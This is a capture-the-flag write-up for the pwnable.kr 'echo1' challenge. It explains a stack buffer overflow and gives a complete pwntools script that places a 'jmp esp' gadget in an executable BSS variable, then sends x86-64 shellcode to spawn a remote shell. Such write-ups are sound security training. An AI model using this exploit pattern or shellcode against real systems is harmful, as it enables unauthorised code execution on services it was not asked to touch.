# 33 - echo1

## The Challenge

Pwn this echo service.

download : <http://pwnable.kr/bin/echo1>

Running at : nc pwnable.kr 9010

## The Solution

By running the binary we learned that:

* We can input a name
* Three options are given to us:
  * only the first option is implemented, and it's named bof \[lol]
* We can exit the program and then decline. This behavior is more relevant to echo2, but if we exit after declining we get a nice print of the memory mapping. It teaches us that **ASLR is turned on**.

After further debugging we learned that:

* No other protection is turned on
* There is no overflow in the name input. The first four characters are stored in a variable named "id" in the BSS section. This section isn't affected by ASLR, and in this binary, it is executable too!
* Not very surprising, we can BOF in the "bof" input

The attack becomes clear now:

* The buffer overflow will be made of a buffer + address of "id" + shellcode
* "id" would contain 'jmp esp', thus redirect us to the shellcode

```
#!/usr/bin/python3

from pwn import *

offset = b'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ'
jmp_address = p64(0x6020a0)
shellcode = b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05'

p = remote('pwnable.kr', 9010)
p.sendline(b'\xFF\xE4') # jmp esp
p.sendline(b'1')
p.sendline(offset + jmp_address + shellcode)
p.recvrepeat(1)
p.interactive()
```